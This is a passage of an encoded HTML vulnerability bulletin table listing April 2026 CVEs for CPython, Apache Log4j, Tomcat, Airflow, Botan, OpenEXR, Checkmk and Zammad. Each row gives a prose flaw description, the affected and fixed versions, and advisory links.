<td class=3D"vendor-product">Python Software Foundation--CPython</td>
<td>When calling base64.b64decode() or related functions the decoding proce=
ss would stop after encountering the first padded quad regardless of whethe=
r there was more information to be processed. This can lead to data being a= ccepted which may be processed differently by other implementations. Use "v= alidate=3DTrue" to enable stricter processing of base64 data.</td> <td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3446" target=3D"= _blank" rel=3D"noopener">CVE-2026-3446</a></td>

<a href=3D"https://github.com/python/cpython/pull/145267" target=3D"_blank"=
rel=3D"noopener">https://github.com/python/cpython/pull/145267</a><br><a h= ref=3D"https://github.com/python/cpython/issues/145264" target=3D"_blank" r= el=3D"noopener">https://github.com/python/cpython/issues/145264</a><br><a h= ref=3D"https://mail.python.org/archives/list/security-announce@python.org/t= hread/F5ZT5ICGJ6CKXVUJ34YBVY7WOZ5SHG53/" target=3D"_blank" rel=3D"noopener"= >https://mail.python.org/archives/list/security-announce@python.org/thread/= F5ZT5ICGJ6CKXVUJ34YBVY7WOZ5SHG53/</a><br><a href=3D"https://github.com/pyth= on/cpython/commit/1f9958f909c1b41a4ffc0b613ef8ec8fa5e7c474" target=3D"_blan=
k" rel=3D"noopener">https://github.com/python/cpython/commit/1f9958f909c1b4= 1a4ffc0b613ef8ec8fa5e7c474</a><br><a href=3D"https://github.com/python/cpyt= hon/commit/4561f6418a691b3e89aef0901f53fe0dfb7f7c0e" target=3D"_blank" rel= =3D"noopener">https://github.com/python/cpython/commit/4561f6418a691b3e89ae= f0901f53fe0dfb7f7c0e</a><br><a href=3D"https://github.com/python/cpython/co= mmit/e31c55121620189a0d1a07b689762d8ca9c1b7fa" target=3D"_blank" rel=3D"noo= pener">https://github.com/python/cpython/commit/e31c55121620189a0d1a07b6897= 62d8ca9c1b7fa</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache Log4j Core<=

<td>The fix for CVE-2025-68161 https://logging.apache.org/security.html#CVE= -2025-68161 was incomplete: it addressed hostname verification only when en= abled via the log4j2.sslVerifyHostName https://logging.apache.org/log4j/2.x= /manual/systemproperties.html#log4j2.sslVerifyHostName system property, but=
not when configured through the verifyHostName https://logging.apache.org/= log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostNam=
e attribute of the &lt;Ssl&gt; element. Although the verifyHostName configu= ration attribute was introduced in Log4j Core 2.12.0, it was silently ignor=
ed in all versions through 2.25.3, leaving TLS connections vulnerable to in= terception regardless of the configured value. A network-based attacker may=
be able to perform a man-in-the-middle attack when all of the following co= nditions are met: * An SMTP, Socket, or Syslog appender is in use. * TLS is=
configured via a nested &lt;Ssl&gt; element. * The attacker can present a = certificate issued by a CA trusted by the appender's configured trust store=
, or by the default Java trust store if none is configured. This issue does=
not affect users of the HTTP appender, which uses a separate verifyHostnam=
e https://logging.apache.org/log4j/2.x/manual/appenders/network.html#HttpAp= pender-attr-verifyHostName attribute that was not subject to this bug and v= erifies host names by default. Users are advised to upgrade to Apache Log4j=
Core 2.25.4, which corrects this issue.</td>
<td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34477" target=3D= "_blank" rel=3D"noopener">CVE-2026-34477</a></td>

<a href=3D"https://github.com/apache/logging-log4j2/pull/4075" target=3D"_b= lank" rel=3D"noopener">https://github.com/apache/logging-log4j2/pull/4075</= a><br><a href=3D"https://logging.apache.org/security.html#CVE-2026-34477" t= arget=3D"_blank" rel=3D"noopener">https://logging.apache.org/security.html#= CVE-2026-34477</a><br><a href=3D"https://logging.apache.org/cyclonedx/vdr.x= ml" target=3D"_blank" rel=3D"noopener">https://logging.apache.org/cyclonedx= /vdr.xml</a><br><a href=3D"https://logging.apache.org/log4j/2.x/manual/appe= nders/network.html#SslConfiguration-attr-verifyHostName" target=3D"_blank" = rel=3D"noopener">https://logging.apache.org/log4j/2.x/manual/appenders/netw= ork.html#SslConfiguration-attr-verifyHostName</a><br><a href=3D"https://lis= ts.apache.org/thread/lkx8cl46t2bvkcwfcb2pd43ygc097lq4" target=3D"_blank" re= l=3D"noopener">https://lists.apache.org/thread/lkx8cl46t2bvkcwfcb2pd43ygc09= 7lq4</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache Log4j Core<=

<td>Apache Log4j Core's Rfc5424Layout https://logging.apache.org/log4j/2.x/= manual/layouts.html#RFC5424Layout , in versions 2.21.0 through 2.25.3, is v= ulnerable to log injection via CRLF sequences due to undocumented renames o=
f security-relevant configuration attributes. Two distinct issues affect us= ers of stream-based syslog services who configure Rfc5424Layout directly: *=
The newLineEscape attribute was silently renamed, causing newline escaping=
to stop working for users of TCP framing (RFC 6587), exposing them to CRLF=
injection in log output. * The useTlsMessageFormat attribute was silently = renamed, causing users of TLS framing (RFC 5425) to be silently downgraded =
to unframed TCP (RFC 6587), without newline escaping. Users of the SyslogAp= pender are not affected, as its configuration attributes were not modified.=
Users are advised to upgrade to Apache Log4j Core 2.25.4, which corrects t= his issue.</td>
<td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34478" target=3D= "_blank" rel=3D"noopener">CVE-2026-34478</a></td>

<a href=3D"https://github.com/apache/logging-log4j2/pull/4074" target=3D"_b= lank" rel=3D"noopener">https://github.com/apache/logging-log4j2/pull/4074</= a><br><a href=3D"https://logging.apache.org/security.html#CVE-2026-34478" t= arget=3D"_blank" rel=3D"noopener">https://logging.apache.org/security.html#= CVE-2026-34478</a><br><a href=3D"https://logging.apache.org/cyclonedx/vdr.x= ml" target=3D"_blank" rel=3D"noopener">https://logging.apache.org/cyclonedx= /vdr.xml</a><br><a href=3D"https://logging.apache.org/log4j/2.x/manual/layo= uts.html#RFC5424Layout" target=3D"_blank" rel=3D"noopener">https://logging.= apache.org/log4j/2.x/manual/layouts.html#RFC5424Layout</a><br><a href=3D"ht= tps://lists.apache.org/thread/3k1clr2l6vkdnl4cbhjrnt1nyjvb5gwt" target=3D"_= blank" rel=3D"noopener">https://lists.apache.org/thread/3k1clr2l6vkdnl4cbhj= rnt1nyjvb5gwt</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache Log4j 1 to = Log4j 2 bridge</td>
<td>The Log4j1XmlLayout from the Apache Log4j 1-to-Log4j 2 bridge fails to = escape characters forbidden by the XML 1.0 standard, producing malformed XM=
L output. Conforming XML parsers are required to reject documents containin=
g such characters with a fatal error, which may cause downstream log proces= sing systems to drop or fail to index affected records. Two groups of users=
are affected: * Those using Log4j1XmlLayout directly in a Log4j Core 2 con= figuration file. * Those using the Log4j 1 configuration compatibility laye=
r with org.apache.log4j.xml.XMLLayout specified as the layout class. Users = are advised to upgrade to Apache Log4j 1-to-Log4j 2 bridge version 2.25.4, = which corrects this issue. Note: The Apache Log4j 1-to-Log4j 2 bridge is de= precated and will not be present in Log4j 3. Users are encouraged to consul=
t the Log4j 1 to Log4j 2 migration guide https://logging.apache.org/log4j/2= .x/migrate-from-log4j1.html , and specifically the section on eliminating r= eliance on the bridge.</td>
<td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34479" target=3D= "_blank" rel=3D"noopener">CVE-2026-34479</a></td>

<a href=3D"https://github.com/apache/logging-log4j2/pull/4078" target=3D"_b= lank" rel=3D"noopener">https://github.com/apache/logging-log4j2/pull/4078</= a><br><a href=3D"https://logging.apache.org/security.html#CVE-2026-34479" t= arget=3D"_blank" rel=3D"noopener">https://logging.apache.org/security.html#= CVE-2026-34479</a><br><a href=3D"https://logging.apache.org/cyclonedx/vdr.x= ml" target=3D"_blank" rel=3D"noopener">https://logging.apache.org/cyclonedx= /vdr.xml</a><br><a href=3D"https://logging.apache.org/log4j/2.x/migrate-fro= m-log4j1.html" target=3D"_blank" rel=3D"noopener">https://logging.apache.or= g/log4j/2.x/migrate-from-log4j1.html</a><br><a href=3D"https://lists.apache= .org/thread/gd0hp6mj17rn3kj279vgy4p7kd4zz5on" target=3D"_blank" rel=3D"noop= ener">https://lists.apache.org/thread/gd0hp6mj17rn3kj279vgy4p7kd4zz5on</a><= br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache Log4j Core<=

<td>Apache Log4j Core's XmlLayout https://logging.apache.org/log4j/2.x/manu= al/layouts.html#XmlLayout , in versions up to and including 2.25.3, fails t=
o sanitize characters forbidden by the XML 1.0 specification https://www.w3= .org/TR/xml/#charsets producing invalid XML output whenever a log message o=
r MDC value contains such characters. The impact depends on the StAX implem= entation in use: * JRE built-in StAX: Forbidden characters are silently wri= tten to the output, producing malformed XML. Conforming parsers must reject=
such documents with a fatal error, which may cause downstream log-processi=
ng systems to drop the affected records. * Alternative StAX implementations=
(e.g., Woodstox https://github.com/FasterXML/woodstox , a transitive depen= dency of the Jackson XML Dataformat module): An exception is thrown during = the logging call, and the log event is never delivered to its intended appe= nder, only to Log4j's internal status logger. Users are advised to upgrade =
to Apache Log4j Core 2.25.4, which corrects this issue by sanitizing forbid= den characters before XML output.</td>
<td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34480" target=3D= "_blank" rel=3D"noopener">CVE-2026-34480</a></td>

<a href=3D"https://github.com/apache/logging-log4j2/pull/4077" target=3D"_b= lank" rel=3D"noopener">https://github.com/apache/logging-log4j2/pull/4077</= a><br><a href=3D"https://logging.apache.org/security.html#CVE-2026-34480" t= arget=3D"_blank" rel=3D"noopener">https://logging.apache.org/security.html#= CVE-2026-34480</a><br><a href=3D"https://logging.apache.org/cyclonedx/vdr.x= ml" target=3D"_blank" rel=3D"noopener">https://logging.apache.org/cyclonedx= /vdr.xml</a><br><a href=3D"https://logging.apache.org/log4j/2.x/manual/layo= uts.html#XmlLayout" target=3D"_blank" rel=3D"noopener">https://logging.apac= he.org/log4j/2.x/manual/layouts.html#XmlLayout</a><br><a href=3D"https://li= sts.apache.org/thread/5x0hcnng0chhghp6jgjdp3qmbbhfjzhb" target=3D"_blank" r= el=3D"noopener">https://lists.apache.org/thread/5x0hcnng0chhghp6jgjdp3qmbbh= fjzhb</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache Log4j JSON = Template Layout</td>
<td>Apache Log4j's JsonTemplateLayout https://logging.apache.org/log4j/2.x/= manual/json-template-layout.html , in versions up to and including 2.25.3, = produces invalid JSON output when log events contain non-finite floating-po= int values (NaN, Infinity, or -Infinity), which are prohibited by RFC 8259.=
This may cause downstream log processing systems to reject or fail to inde=
x affected records. An attacker can exploit this issue only if both of the = following conditions are met: * The application uses JsonTemplateLayout. * = The application logs a MapMessage containing an attacker-controlled floatin= g-point value. Users are advised to upgrade to Apache Log4j JSON Template L= ayout 2.25.4, which corrects this issue.</td>
<td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34481" target=3D= "_blank" rel=3D"noopener">CVE-2026-34481</a></td>

<a href=3D"https://github.com/apache/logging-log4j2/pull/4080" target=3D"_b= lank" rel=3D"noopener">https://github.com/apache/logging-log4j2/pull/4080</= a><br><a href=3D"https://logging.apache.org/security.html#CVE-2026-34481" t= arget=3D"_blank" rel=3D"noopener">https://logging.apache.org/security.html#= CVE-2026-34481</a><br><a href=3D"https://logging.apache.org/cyclonedx/vdr.x= ml" target=3D"_blank" rel=3D"noopener">https://logging.apache.org/cyclonedx= /vdr.xml</a><br><a href=3D"https://logging.apache.org/log4j/2.x/manual/json= -template-layout.html" target=3D"_blank" rel=3D"noopener">https://logging.a= pache.org/log4j/2.x/manual/json-template-layout.html</a><br><a href=3D"http= s://lists.apache.org/thread/n34zdv00gbkdbzt2rx9rf5mqz6lhopcv" target=3D"_bl= ank" rel=3D"noopener">https://lists.apache.org/thread/n34zdv00gbkdbzt2rx9rf= 5mqz6lhopcv</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache Tomcat</td> <td>Improper Encoding or Escaping of Output vulnerability in the JsonAccess= LogValve component of Apache Tomcat. This issue affects Apache Tomcat: from=
11.0.0-M1 through 11.0.20, from 10.1.0-M1 through 10.1.53, from 9.0.40 thr= ough 9.0.116. Users are recommended to upgrade to version 11.0.21, 10.1.54 =
or 9.0.117 , which fix the issue.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34483" target=3D= "_blank" rel=3D"noopener">CVE-2026-34483</a></td>

<a href=3D"https://lists.apache.org/thread/j1w7304yonlr8vo1tkb5nfs7od1y228b=
" target=3D"_blank" rel=3D"noopener">https://lists.apache.org/thread/j1w730= 4yonlr8vo1tkb5nfs7od1y228b</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache Tomcat</td> <td>Missing Encryption of Sensitive Data vulnerability in Apache Tomcat due=
to the=C2=A0fix for CVE-2026-29146 allowing the bypass of the EncryptInter= ceptor. This issue affects Apache Tomcat: 11.0.20, 10.1.53, 9.0.116. Users = are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117, which fi=
x the issue.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34486" target=3D= "_blank" rel=3D"noopener">CVE-2026-34486</a></td>

<a href=3D"https://lists.apache.org/thread/9510k5p5zdvt9pkkgtyp85mvwxo2qrly=
" target=3D"_blank" rel=3D"noopener">https://lists.apache.org/thread/9510k5= p5zdvt9pkkgtyp85mvwxo2qrly</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache Tomcat</td> <td>Insertion of Sensitive Information into Log File vulnerability in the c= loud membership for clustering component of Apache Tomcat exposed the Kuber= netes bearer token. This issue affects Apache Tomcat: from 11.0.0-M1 throug=
h 11.0.20, from 10.1.0-M1 through 10.1.53, from 9.0.13 through 9.0.116. Use=
rs are recommended to upgrade to version 11.0.21, 10.1.54 or 9.0.117, which=
fix the issue.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34487" target=3D= "_blank" rel=3D"noopener">CVE-2026-34487</a></td>

<a href=3D"https://lists.apache.org/thread/4xpkwolpkrj8v5xzp5nyovtlqp3y850h=
" target=3D"_blank" rel=3D"noopener">https://lists.apache.org/thread/4xpkwo= lpkrj8v5xzp5nyovtlqp3y850h</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache Tomcat</td> <td>CLIENT_CERT authentication does not fail as expected for some scenarios=
when soft fail is disabled and FFM is used in Apache Tomcat. This issue af= fects Apache Tomcat: from 11.0.0-M14 through 11.0.20, from 10.1.22 through = 10.1.53, from 9.0.92 through 9.0.116. Users are recommended to upgrade to v= ersion 11.0.21, 10.1.54 or 9.0.117, which fixes the issue.</td> <td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34500" target=3D= "_blank" rel=3D"noopener">CVE-2026-34500</a></td>

<a href=3D"https://lists.apache.org/thread/7rcl4zdxryc8hy3htyfyxkbqpxjtfdl2=
" target=3D"_blank" rel=3D"noopener">https://lists.apache.org/thread/7rcl4z= dxryc8hy3htyfyxkbqpxjtfdl2</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache Airflow</td=

<td>Apache Airflow versions 3.0.0 through 3.1.8 DagRun wait endpoint return=
s XCom result values even to users who only have DAG Run read permissions, = such as the Viewer role.This behavior conflicts with the FAB RBAC model, wh= ich treats XCom as a separate protected resource, and with the security mod=
el documentation that defines the Viewer role as read-only. Airflow uses th=
e FAB Auth Manager to manage access control on a per-resource basis. The Vi= ewer role is intended to be read-only by default, and the security model do= cumentation defines Viewer users as those who can inspect DAGs without acce= ssing sensitive execution results. Users are recommended to upgrade to Apac=
he Airflow 3.2.0 which resolves this issue.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34538" target=3D= "_blank" rel=3D"noopener">CVE-2026-34538</a></td>

<a href=3D"https://github.com/apache/airflow/pull/64415" target=3D"_blank" = rel=3D"noopener">https://github.com/apache/airflow/pull/64415</a><br><a hre= f=3D"https://lists.apache.org/thread/9mq3msqhmgjwdzbr6bgthj4brb3oz9fl" targ= et=3D"_blank" rel=3D"noopener">https://lists.apache.org/thread/9mq3msqhmgjw= dzbr6bgthj4brb3oz9fl</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">randombit--botan</td>
<td>Botan is a C++ cryptography library. In 3.11.0, the function Certificat= e_Store::certificate_known had a misleading name; it would return true if a=
ny certificate in the store had a DN (and subject key identifier, if set) m= atching that of the argument. It did not check that the cert it found and t=
he cert it was passed were actually the same certificate. In 3.11.0 an exte= nsion of path validation logic was made which assumed that certificate_know=
n only returned true if the certificates were in fact identical. The impact=
is that if an end entity certificate is presented, and its DN (and subject=
key identifier, if set) match that of any trusted root, the end entity cer= tificate is accepted immediately as if it itself were a trusted root. , Thi=
s vulnerability is fixed in 3.11.1.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34580" target=3D= "_blank" rel=3D"noopener">CVE-2026-34580</a></td>

<a href=3D"https://github.com/randombit/botan/security/advisories/GHSA-v782= -6fq4-q827" target=3D"_blank" rel=3D"noopener">https://github.com/randombit= /botan/security/advisories/GHSA-v782-6fq4-q827</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">randombit--botan</td>
<td>Botan is a C++ cryptography library. Prior to version 3.11.1, the TLS 1=
.3 implementation allowed ApplicationData records to be processed prior to = the Finished message being received. A server which is attempting to enforc=
e client authentication via certificates can by bypassed by a client which = entirely omits Certificate, CertificateVerify, and the Finished message and=
instead sends application data records. This vulnerability is fixed in 3.1= 1.1.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34582" target=3D= "_blank" rel=3D"noopener">CVE-2026-34582</a></td>

<a href=3D"https://github.com/randombit/botan/security/advisories/GHSA-pxcj= -9ppx-g86g" target=3D"_blank" rel=3D"noopener">https://github.com/randombit= /botan/security/advisories/GHSA-pxcj-9ppx-g86g</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">AcademySoftwareFoundation--openexr</td> <td>OpenEXR provides the specification and reference implementation of the = EXR file format, an image storage format for the motion picture industry. F= rom 3.1.0 to before 3.2.7, 3.3.9, and 3.4.9, internal_exr_undo_piz() advanc=
es the working wavelet pointer with signed 32-bit arithmetic. Because nx, n=
y, and wcount are int, a crafted EXR file can make this product overflow an=
d wrap. The next channel then decodes from an incorrect address. The wavele=
t decode path operates in place, so this yields both out-of-bounds reads an=
d out-of-bounds writes. This vulnerability is fixed in 3.2.7, 3.3.9, and 3.= 4.9.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34588" target=3D= "_blank" rel=3D"noopener">CVE-2026-34588</a></td>

<a href=3D"https://github.com/AcademySoftwareFoundation/openexr/security/ad= visories/GHSA-588r-cr5c-w6hf" target=3D"_blank" rel=3D"noopener">https://gi= thub.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-588r-cr= 5c-w6hf</a><br><a href=3D"https://github.com/AcademySoftwareFoundation/open= exr/releases/tag/v3.2.7" target=3D"_blank" rel=3D"noopener">https://github.= com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7</a><br><a href=3D= "https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9" = target=3D"_blank" rel=3D"noopener">https://github.com/AcademySoftwareFounda= tion/openexr/releases/tag/v3.3.9</a><br><a href=3D"https://github.com/Acade= mySoftwareFoundation/openexr/releases/tag/v3.4.9" target=3D"_blank" rel=3D"= noopener">https://github.com/AcademySoftwareFoundation/openexr/releases/tag= /v3.4.9</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">AcademySoftwareFoundation--openexr</td> <td>OpenEXR provides the specification and reference implementation of the = EXR file format, an image storage format for the motion picture industry. F= rom 3.2.0 to before 3.2.7, 3.3.9, and 3.4.9, the DWA lossy decoder construc=
ts temporary per-component block pointers using signed 32-bit arithmetic. F=
or a large enough width, the calculation overflows and later decoder stores=
operate on a wrapped pointer outside the allocated rowBlock backing store.=
This vulnerability is fixed in 3.2.7, 3.3.9, and 3.4.9.</td> <td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34589" target=3D= "_blank" rel=3D"noopener">CVE-2026-34589</a></td>

<a href=3D"https://github.com/AcademySoftwareFoundation/openexr/security/ad= visories/GHSA-p8xc-w3q4-h64x" target=3D"_blank" rel=3D"noopener">https://gi= thub.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-p8xc-w3= q4-h64x</a><br><a href=3D"https://github.com/AcademySoftwareFoundation/open= exr/releases/tag/v3.2.7" target=3D"_blank" rel=3D"noopener">https://github.= com/AcademySoftwareFoundation/openexr/releases/tag/v3.2.7</a><br><a href=3D= "https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.3.9" = target=3D"_blank" rel=3D"noopener">https://github.com/AcademySoftwareFounda= tion/openexr/releases/tag/v3.3.9</a><br><a href=3D"https://github.com/Acade= mySoftwareFoundation/openexr/releases/tag/v3.4.9" target=3D"_blank" rel=3D"= noopener">https://github.com/AcademySoftwareFoundation/openexr/releases/tag= /v3.4.9</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Checkmk GmbH--Checkmk</td>
<td>Insufficient sanitization of dashboard dashlet title links in Checkmk 2= .2.0 (EOL), Checkmk 2.3.0 before 2.3.0p46, Checkmk 2.4.0 before 2.4.0p25, a=
nd Checkmk 2.5.0 (beta) before 2.5.0b3 allows an attacker with dashboard cr= eation privileges to perform stored cross-site scripting (XSS) attacks by t= ricking a victim into clicking a crafted dashlet title link on a shared das= hboard.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-3466" target=3D"= _blank" rel=3D"noopener">CVE-2026-3466</a></td>

<a href=3D"https://checkmk.com/werk/19033" target=3D"_blank" rel=3D"noopene= r">https://checkmk.com/werk/19033</a><br><a href=3D"https://www.vulncheck.c= om/advisories/checkmk-stored-cross-site-scripting-in-dashlet-title" target= =3D"_blank" rel=3D"noopener">https://www.vulncheck.com/advisories/checkmk-s= tored-cross-site-scripting-in-dashlet-title</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">zammad--zammad</td>
<td>Zammad is a web based open source helpdesk/customer support system. Pri=
or to 7.0.1 and 6.5.4, the HTML sanitizer for ticket articles was missing p= roper sanitization of data: ... URI schemes, resulting in storing such mali= cious content in the database of the Zammad instance. The Zammad GUI is ren= dering this content, due to applied CSP rules no harm was done by e.g., cli= cking such a link. This vulnerability is fixed in 7.0.1 and 6.5.4.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34718" target=3D= "_blank" rel=3D"noopener">CVE-2026-34718</a></td>

<a href=3D"https://github.com/zammad/zammad/security/advisories/GHSA-c2cf-9= fc7-jhf3" target=3D"_blank" rel=3D"noopener">https://github.com/zammad/zamm= ad/security/advisories/GHSA-c2cf-9fc7-jhf3</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">zammad--zammad</td>
<td>Zammad is a web based open source helpdesk/customer support system. Pri=
or to 7.0.1 and 6.5.4, the webhook model was missing a proper validation fo=
r loop back addresses, or link-local addresses - only the URL scheme (HTTP/= HTTPS) as well as the hostname was checked. This could end up in retrieving=
confidential metadata of cloud/hosting providers. The existing check is no=
w extended and is applied when configuring webhooks as well as triggering w= ebhook jobs. This vulnerability is fixed in 7.0.1 and 6.5.4.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34719" target=3D= "_blank" rel=3D"noopener">CVE-2026-34719</a></td>

<a href=3D"https://github.com/zammad/zammad/security/advisories/GHSA-2vgc-v= fh2-rw75" target=3D"_blank" rel=3D"noopener">https://github.com/zammad/zamm= ad/security/advisories/GHSA-2vgc-vfh2-rw75</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">zammad--zammad</td>
<td>Zammad is a web based open source helpdesk/customer support system. Pri=
or to 7.0.1 and 6.5.4, the SSO mechanism in Zammad was not verifying the he= ader originates from a trusted SSO proxy/gateway before applying further ac= tions on it. This vulnerability is fixed in 7.0.1 and 6.5.4.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34720" target=3D= "_blank" rel=3D"noopener">CVE-2026-34720</a></td>

<a href=3D"https://github.com/zammad/zammad/security/advisories/GHSA-hcv6-w= 4h9-p2p7" target=3D"_blank" rel=3D"noopener">https://github.com/zammad/zamm= ad/security/advisories/GHSA-hcv6-w4h9-p2p7</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">zammad--zammad</td>
<td>Zammad is a web based open source helpdesk/customer support system. Pri=
or to 7.0.1 and 6.5.4, the OAuth callback endpoints for Microsoft, Google, = and Facebook external credentials do not validate a CSRF state parameter. T= his vulnerability is fixed in 7.0.1 and 6.5.4.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34721" target=3D= "_blank" rel=3D"noopener">CVE-2026-34721</a></td>

<a href=3D"https://github.com/zammad/zammad/security/advisories/GHSA-mfwp-h= x66-626c" target=3D"_blank" rel=3D"noopener">https://github.com/zammad/zamm= ad/security/advisories/GHSA-mfwp-hx66-626c</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">zammad--zammad</td>
<td>Zammad is a web based open source helpdesk/customer support system. Pri=
or to 7.0.1 and 6.5.4, the used endpoint for ticket creation was missing au= thorization if the related parameter for adding links is used. This vulnera= bility is fixed in 7.0.1 and 6.5.4.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34722" target=3D= "_blank" rel=3D"noopener">CVE-2026-34722</a></td>

<a href=3D"https://github.com/zammad/zammad/security/advisories/GHSA-28m3-w= wgv-ppw8" target=3D"_blank" rel=3D"noopener">https://github.com/zammad/zamm= ad/security/advisories/GHSA-28m3-wwgv-ppw8</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">zammad--zammad</td>
<td>Zammad is a web based open source helpdesk/customer support system. Pri=
or to 7.0.1 and 6.5.4, unauthenticated remote attackers were able to access=
the getting started endpoint to get access to sensitive internal entity da= ta, even after the system setup was completed. This vulnerability is fixed =
in 7.0.1 and 6.5.4.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34723" target=3D= "_blank" rel=3D"noopener">CVE-2026-34723</a></td>

<a href=3D"https://github.com/zammad/zammad/security/advisories/GHSA-hcm9-c= h62-5727" target=3D"_blank" rel=3D"noopener">https://github.com/zammad/zamm= ad/security/advisories/GHSA-hcm9-ch62-5727</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">zammad--zammad</td>
<td>Zammad is a web based open source helpdesk/customer support system. Pri=
or to 7.0.1, a server-side template injection vulnerability which leads to = RCE via AI Agent exists. Impact is limited to environments where an attacke=
r can control or influence type_enrichment_data (typically high-privilege a= dministrative configuration). This vulnerability is fixed in 7.0.1.</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34724" target=3D= "_blank" rel=3D"noopener">CVE-2026-34724</a></td>

<a href=3D"https://github.com/zammad/zammad/security/advisories/GHSA-fg9w-j= g8f-4j94" target=3D"_blank" rel=3D"noopener">https://github.com/zammad/zamm= ad/security/advisories/GHSA-fg9w-jg8f-4j94</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">zammad--zammad</td>
<td>Zammad is a web based open source helpdesk/customer support system. Pri=
or to 7.0.1 and 6.5.4, the REST endpoint POST /api/v1/ai_assistance/text_to= ols/:id was not checking if a user is privileged to use the text tool, resu= lting in being able to use it in all situations. This vulnerability is fixe=
d in 7.0.1 and 6.5.4.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-34782" target=3D= "_blank" rel=3D"noopener">CVE-2026-34782</a></td>

<a href=3D"https://github.com/zammad/zammad/security/advisories/GHSA-96r7-2= 9c8-2j7q" target=3D"_blank" rel=3D"noopener">https://github.com/zammad/zamm= ad/security/advisories/GHSA-96r7-29c8-2j7q</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">zammad--zammad</td>
<td>Zammad is a web based open source helpdesk/customer support system. Pri=
or to 7.0.1, he REST endpoint POST /api/v1/ai_assistance/text_tools/:id con= tains an authorization failure. Context data (e.g., a group or organization=
) supplied to be used in the AI prompt were not checked if they are accessi= ble for the current user. This leads to having data present in the AI promp=
t that were not authorized before being used. A user needs to have ticket.a= gent permission to be able to use the provided context data. This vulnerabi= lity is fixed in 7.0.1.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
